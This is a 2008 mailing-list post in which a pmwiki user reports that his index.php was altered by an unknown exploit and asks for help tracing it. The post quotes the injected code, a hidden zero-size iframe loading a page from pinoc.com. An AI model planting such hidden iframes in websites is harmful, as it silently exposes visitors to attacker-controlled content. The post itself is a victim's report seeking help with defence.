[pmwiki-users] Possible security issue

Marcus films at wordit.com
Wed Mar 5 06:32:18 CST 2008

I have a possible security issue, not sure whether it is pmwiki or on my 
I've been running pmwiki for about a week online. Yesterday the 
index.php page gave a syntax error about a missing closing tag. I 
wondered why the page had changed when I hadn't edited it.
It turns out somebody was able to use a security exploit to write to the 
index.php file. They add the following iframe:

<?php include('pmwiki.php');
<iframe src="http://pinoc.com/count.php?o=2" width=0 height=0 
style="hidden" frameborder=0 marginheight=0 marginwidth=0 

I've no idea what that domain pinoc.com is and what the intention is. 
Normally I think they are spammers trying to add links. If so, where do 
I report them?

The file was only writable by owner. Now I changed all permissions to 
read-only. That solves it, but I'd still like to know how it could be 

I'm running pmwiki-2.2.0-beta65. Any ideas whether this is a pmwiki 
issue or my setup, or my general server security?

Before I forget, a big Thank You to Patrick and the other developers for 
pmwiki. I'm running Puppy Linux, which follows a similar philosophy as 
pmwiki, trying to avoid bloat yet remain powerful. pmwiki being under 
2MB unpacked is brilliant. It just works out of the box. I can rsync 
with local and online wikis because pmwiki uses flast files. With 
lighty, and PHP it's all only 15MB. You really did make it simple and 
extensible. Great job.

Many Thanks,


More information about the pmwiki-users mailing list